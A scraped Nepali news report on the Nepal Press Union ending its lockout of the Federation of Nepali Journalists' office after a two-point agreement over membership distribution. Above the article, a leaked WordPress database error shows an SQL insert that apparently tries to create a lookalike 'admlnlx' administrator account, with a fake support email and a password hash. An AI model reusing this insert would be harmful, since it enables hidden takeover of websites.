WordPress database error: [Duplicate entry '0' for key 'PRIMARY']INSERT INTO `gi_users` (`user_pass`, `user_nicename`, `user_email`, `user_url`, `user_registered`, `user_activation_key`, `display_name`, `user_login`) VALUES ('$P$BqcKDnEehLS/YyqDGOi7rvKhUZWxiS.', 'admlnlx', 'wordpresupport@gaulekhabar.com', '', '2026-01-31 11:48:12', '', 'admlnlx', 'admlnlx')
काठमाडौँ, फागुन ६ –
नेपाल प्रेस युनियनले नेपाल पत्रकार महासङ्घको केन्द्रीय कार्यालयमा गरेको तालाबन्दी खुलेको छ ।
महासङ्घ र प्रेस युनियन नेतृत्वबीच आज दुईबुँदे सहमति भएपछि तालाबन्दी खोलिएको हो ।
महासङ्घ नेतृत्वले नयाँ सदस्यता वितरणमा एकलौटी गरेको भन्दै युनियनले यही फागुन २ गते तालाबन्दी गरेको थियो ।
सहमति पत्रमा युनियनले सरोकार राखेका विषयलाई सम्बोधन गर्दै महासङ्घले आजै विज्ञप्ति जारी गर्ने र युनियनले महासङ्घको केन्द्रीय कार्यालयमा लगाएको ताला तत्काल खोल्ने उल्लेख छ ।
ताला खोलेपछि महासङ्घका अध्यक्ष डा महेन्द्र विष्टले युनियनले सरोकार राखेका विषयलाई महासङ्घले बुझेको बताउँदै महासङ्घ सबैको साझा संस्था भएकोमा जोड दिनुभयो ।
युनियनका अध्यक्ष बद्री सिग्देलले महासङ्घले आफ्नो साझा चरित्र बचाएर अघि बढ्नुपर्ने बताउँदै वास्तविक पत्रकारलाई मात्र महासङ्घको सदस्यता वितरण गर्नुपर्ने सुझाव दिनुभयो ।
महासङ्घले विधि, प्रक्रिया र अभ्यासलाई लत्याएर दल विशेषका कार्यकर्तालाई सदस्यता दिने र नवीकरण गर्ने गरेको कामप्रति अवगत गराउँदा पनि त्यसलाई बेवास्ता गरेका कारण बाध्य भएर तालाबन्दी गर्नुपरेको युनियनले जनाएको थियो । – रासस